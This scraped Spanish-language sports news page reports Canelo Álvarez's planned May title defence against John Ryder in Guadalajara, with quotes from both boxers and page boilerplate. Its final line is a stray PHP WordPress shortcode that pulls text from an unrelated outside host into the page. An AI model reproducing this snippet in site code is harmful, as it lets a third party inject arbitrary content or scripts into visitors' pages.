Canelo Álvarez Gennady Golovkin

ARCHIVO – El boxeador mexicano Saúl “Canelo” Álvarez posa con su cinturón y corona después de derrotar al boxeador kazajo Gennady Golovkin para retener su corona indiscutible de peso súper mediano en Las Vegas, Nevada, el 17 de septiembre de 2022. Marrón/AFP)



El indiscutible rey de peso súper mediano Saúl “Canelo” Álvarez defenderá su título contra el británico John Ryder en Guadalajara en mayo, la primera vez que la superestrella mexicana pelea en su tierra natal desde 2011.


Álvarez (58-2-2, 29 nocauts) peleará contra Ryder el 6 de mayo en el Estadio Akron, el estadio local del club CD Guadalajara de la Liga MX, dijeron los promotores de Matchroom Boxing.


Esta es la primera vez que Álvarez pelea en México desde que derrotó a Kermit Centron en la Ciudad de México en 2011.


La competencia también está ligada a la festividad mexicana del Cinco de Mayo.


“Estoy muy feliz de estar de vuelta en mayo porque después de mi cirugía, no estaba seguro de cuándo volvería”, dijo Álvarez, de 32 años.


“Volver al ring y volver a pelear en Jalisco, de donde soy, me hace especialmente feliz.


“Y en John Ryder, me enfrento a un boxeador muy competitivo”.


Álvarez defenderá su corona indiscutible por segunda vez después de derrotar a su rival Gennady Golovkin en septiembre pasado.


El retador obligatorio de la OMB, Ryder, peleó por última vez en noviembre, derrotando a Zach Parker por nocaut técnico para capturar el título interino de la OMB.


El jugador de 34 años también obtuvo una sorprendente victoria contra Daniel Jacobs a principios de 2022.


“Canelo es uno de los grandes y tengo mucho respeto por lo que ha logrado en el deporte, pero creo firmemente que es hora de cumplir mi sueño de ser campeón mundial”, dijo Ryder.


Historias relacionadas


background-color: #ffffff; ">








Su suscripción no se pudo guardar. Intentar otra vez.











Su suscripción ha sido exitosa.







Leer siguiente



No te pierdas las últimas noticias e información.


Suscríbase a INQUIRER PLUS para acceder a Philippine Daily Inquirer y otros más de 70 títulos, comparta hasta 5 dispositivos, escuche noticias, descargue hasta las 4 a. m. y comparta artículos en las redes sociales. Llama al 896 6000



Para comentarios, quejas o consultas, contáctenos.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');